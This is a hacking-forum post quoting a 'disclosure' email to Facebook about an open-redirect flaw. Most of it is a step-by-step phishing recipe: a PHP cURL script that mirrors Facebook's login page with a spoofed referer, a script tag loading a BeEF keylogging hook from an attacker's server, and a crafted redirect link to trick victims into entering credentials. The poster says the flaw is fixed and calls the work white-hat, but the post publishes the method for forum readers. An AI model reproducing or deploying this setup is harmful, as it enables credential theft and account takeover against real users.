Hello a few days before i have warned facebook about a redirect vulnerability, i have sended them a mail to correct the vuln. Im verry happy because they replied me fastly and they have corrected their vuln.
So now i can publish the technique legally, for your eyes pleasure.
[hide=5]3 days later the answer from the Facebook's staff:Code:From: pelo greyhat To: abuse@facebook.com Subject: [New Facebook] New Facebook vulnerability Hello , i want to inform that i have discovered a facebook redirect vulnerability, to help you understanding how to exploit redirection vulnerability i have made a video. How to make easyly a fake page keylogging the keyboard of the victim. we need: - a 0day redirect vulnerabilitiy - a server with cURL enabled. - beef (google it and install it onto your server) - a little bit of Social Engineering (the victim has to click on your link and enter his credentials). host this php/js script on your server: curltrickbyp3lo.php <?php //50-1337 Crew presents: Universal redirect exploiter by p3Lo //Greetz: 50-1337 CreW //spoofing referer $referer="http://www.facebook.com/"; // spoofing FireFox 2.0 $useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"; $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, "http://www.facebook.com/"); curl_setopt ($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_REFERER, $referer); curl_exec ($ch); curl_close ($ch); ?> <script src="http://beefsite/beef/hook/beefmagic.js.php"></script> Now when the victim click on your redirect like : http://www.facebook.com/#//beefsite/curltrickbyp3lo.php He will see the facebook login page hosted onto your website and keylogged with beef . http://fr.youtube.com/watch?v=ArMD5XoJWnM&fmt=18 I have used my server only for testing purpose. The vulnerability has just been seen by my white hat friends. Of course none of the accounts have been stolen for the tutorial. No body has used this technique illegaly. Ill'be proud to know this vulnerability fixed. PS:sorry for my bad english i am french. Cordially .p3Lo -----End Original Message to Facebook-----
[code]
Subject
Reply With Quote
